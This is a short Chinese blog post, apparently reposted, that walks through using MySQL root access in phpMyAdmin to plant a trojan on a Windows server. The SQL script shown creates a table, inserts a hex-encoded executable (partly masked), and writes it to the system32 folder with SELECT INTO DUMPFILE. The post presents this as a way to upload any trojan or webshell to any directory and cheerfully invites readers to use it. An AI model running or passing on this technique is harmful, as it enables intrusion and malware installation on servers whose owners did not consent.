mysql root权限入侵实例，可上传任意木马

冰已成风

mysql root权限入侵实例，可上传任意木马
来自：senlingusi.cn

第一部，确认你取得了mysql的root权限。

然后用phpmyadmin进行连接，打开sql执行器：

执行下面的脚本：

CREATE TABLE aa (cmd BLOB);
INSERT into aa values (CONVERT(0×5a656e64***00b323****0232,CHAR));
SELECT * FROM aa INTO DUMPFILE “C:\\\\windows\\\\system32\\\\runabc.exe”;
drop table aa;

上面的代码中的有删除线的部分（0×5a656e64***00b323****0232）就是木马的内容了，这部分代码可以使用本站发布的“php将文件或字符串转换成16进制”这个文件来将木马编码。

利用本脚本可以上传任意木马，任意网马到网站的任意目录。injoy it!